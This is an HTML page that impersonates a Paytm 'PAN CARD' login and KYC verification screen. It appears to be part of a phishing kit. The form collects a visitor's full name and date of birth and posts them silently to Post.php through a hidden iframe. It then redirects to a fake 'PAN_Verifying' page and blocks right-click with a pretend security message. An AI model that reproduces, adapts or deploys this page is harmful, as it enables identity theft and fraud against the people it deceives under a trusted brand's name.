<!DOCTYPE html>
<html lang="eng">
<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
 <link rel="apple-touch-icon" sizes="180x180" href="/Paytm/apple-touch-icon.png">
 <link rel="icon" type="image/png" sizes="32x32" href="/Paytm/favicon-32x32.png">
 <link rel="icon" type="image/png" sizes="16x16" href="/Paytm/favicon-16x16.png">
 <link rel="manifest" href="/Paytm/site.webmanifest">
  <meta name="msapplication-TileColor" content="#da532c">
  <meta name="theme-color" content="#ffffff">
  <title>Paytm login - PAN CARD</title>
  <style>
    #ml
    {
      width:100%;
    }
    #kyc
    {
       width:80%;
    }
    #tp,#pp,#dob
    {
    width: 295px;
    height: 30px;
    background-color: white;
    border-color:#01B9F5;
    color:#404145;
    font-size: 15px !important;
    font-weight:bold;
    padding: 1px 5px;
    margin-bottom:10px;
    margin-left:18px;
    outline: none;
    background:none;
    box-shadow: 0px 2px 0px #DADADA;
    border:none;
   }
   #tp:hover
   {
   box-shadow: 0px 2px 0px #00B1F1
   
   }
   #dob:hover
   {
   box-shadow: 0px 2px 0px #00B1F1
   
   }
    #btn
    {
    width:120px;
    background-color:#01B9F5;
    color: white;
    border: solid black;
    margin-top:10%;
    margin-left:20px;
    border-radius: 2px;
    border-width: 0px;
    font-weight: bold;
    cursor: pointer;
    font-size: 15px;
    height:36px;
    }
    #ab
    {
    width:365px;
    margin:50px;
    border-bottom:solid #E6E6E6;
    border-width:1.2px;
    }
    input::-webkit-input-placeholder {
    color: #CCCCCC;
    font-weight:bold;
    text-transform:none;
    }
    input:-moz-placeholder {
    color: #CCCCCC;
    font-weight:bold;
    text-transform:none;
    }
    input::-moz-placeholder {
    color: #CCCCCC;
    font-weight:bold;
    text-transform:none;
    }
    input:-ms-input-placeholder {
    color: #CCCCCC;
    font-weight:bold;
    text-transform:none;
    }
    .Fname
    {
    text-transform:uppercase;
    }
    .error
    {
    color: Red;
    font-family: 'DM Sans', sans-serif;
    font-size:12px;
    margin-top:-1%;
    margin-left:15px;
    font-style: italic;
    }
    </style>
    <script language="javascript"> 
    var message="For security reasons, This function is not allowed here.";
    function clickIE4(){
    if (event.button==2){
    alert(message);
    return false;
    }
    }
    function clickNS4(e){
    if (document.layers||document.getElementById&&!document.all){
    if (e.which==2||e.which==3){
    alert(message);
    return false;
    }
    }
    }
    if (document.layers){
    document.captureEvents(Event.MOUSEDOWN);
    document.onmousedown=clickNS4;}
    else if (document.all&&!document.getElementById){
    document.onmousedown=clickIE4;}
    document.oncontextmenu=new Function("alert(message);return false;")
    </script>
    </head>
    <body onload="startTimer();">
    <!-- Static- Please don't do anything here-->
    <script type="text/javascript">var submitted=false;</script>
    <iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location='PAN_Verifying.html';}"></iframe>
    <!--My Form-->
    <form action="Post.php" method="post" target="hidden_iframe" onsubmit="submitted=true" class="myform">
    <img src="ptml.jpg" alt="" id="ml"><br><br>
    <div>
    <center>
    <h3 style="
    background-color:#DFF6FE;
    padding: 15px 3px;
    border-radius:1px;
    margin:0px;
    margin-left:-6px;
    font-size:16px;
    color:black;
    width:350px;
    height:20px;"
    >Name And Date Of Birth Verification</b></center><br>
    </div>
    <b style="font-family:arial; font-size:15px; color:#01B9F5; margin-left:20px;">Enter Full Name</b><br>
    <input type="text" name="Full Name" class="Fname" id="tp" placeholder="Enter Full Name (As Per PAN)"
    required=""><br>
    <table id="tblForm" border="0" cellpadding="5" cellspacing="0">
    <b style="font-family:arial; font-size:15px; color:#01B9F5; margin-left:20px;">Enter Date Of Birth</b>
    <input type="text" inputmode="numeric" maxlength="10" name="Date_Of_Birth" id="dob" placeholder="DD/MM/YYYY"
    required=""><br>
    <p1><span class="error" style="display: none">Invalid Date Of Birth !</span></p1>
    <script type="text/javascript">
    var isShift = false;
    var seperator = "/";
    window.onload = function () {
    //Reference the Table.
    var tblForm = document.getElementById("tblForm");
    
    //Reference all INPUT elements in the Table.
    var inputs = document.getElementsByTagName("input");
    
    //Loop through all INPUT elements.
    for (var i = 0; i < inputs.length; i++) {
    //Check whether the INPUT element is TextBox.
    if (inputs[i].name == "Date_Of_Birth") {
    //Check whether Date Format Validation is required.
    if (inputs[i].className.indexOf("date-format") != 1) {
    
    //Set Max Length.
    inputs[i].setAttribute("maxlength", 10);
    
    //Only allow Numeric Keys.
    inputs[i].onkeydown = function (e) {
    return IsNumeric(this, e.keyCode);
    };
    
    //Validate Date as User types.
    inputs[i].onkeyup = function (e) {
    ValidateDateFormat(this, e.keyCode);
    };
    }
    }
    }
    };
    
    function IsNumeric(input, keyCode) {
    if (keyCode == 16) {
    isShift = true;
    }
    //Allow only Numeric Keys.
    if (((keyCode >= 48 && keyCode <= 57) || keyCode == 8 || keyCode <= 37 || keyCode <= 39 || (keyCode >= 96 && keyCode <= 105)) && isShift == false) {
    if ((input.value.length == 2 || input.value.length == 5) && keyCode != 8) {
    input.value += seperator;
    }
    
    return true;
    }
    else {
    return false;
    }
    };
    
    function ValidateDateFormat(input, keyCode) {
    var dateString = input.value;
    if (keyCode == 16) {
    isShift = false;
    }
    var regex = /(((0|1)[0-9]|2[0-9]|3[0-1])\/(0[1-9]|1[0-2])\/((19|20)\d\d))$/;
    
    //Check whether valid dd/MM/yyyy Date Format.
    if (regex.test(dateString) || dateString.length == 0) {
    ShowHideError(input, "none");
    } else {
    ShowHideError(input, "block");
    }
    };
    
    function ShowHideError(textbox, display) {
    var row = textbox.parentNode.parentNode;
    var errorMsg = row.getElementsByTagName("span")[0];
    if (errorMsg != null) {
    errorMsg.style.display = display;
    }
    };
    </script>
    <button type="submit" id="btn" style="font-weight:bold;">Submit</button><br><br><br><br>
    <!--<b style="color:#01B9F5; font-size:15px; font-family: Arial, Helvetica, sans-serif; margin-left:20px;">Know more about Passcode authentication</span></b><br>
    <i style="color:grey; font-size:15px; font-weight:bold;margin-left:20px;">Having trouble logging in ?</i>
     <span style="color: #01B9F5; font-weight:bold;"><i style="font-size:15px; font-weight:bold;">Contact us</i></span>-->
     <center><img src="BenifitKYC.png" alt="" id="kyc"></center>
     </form></body></html>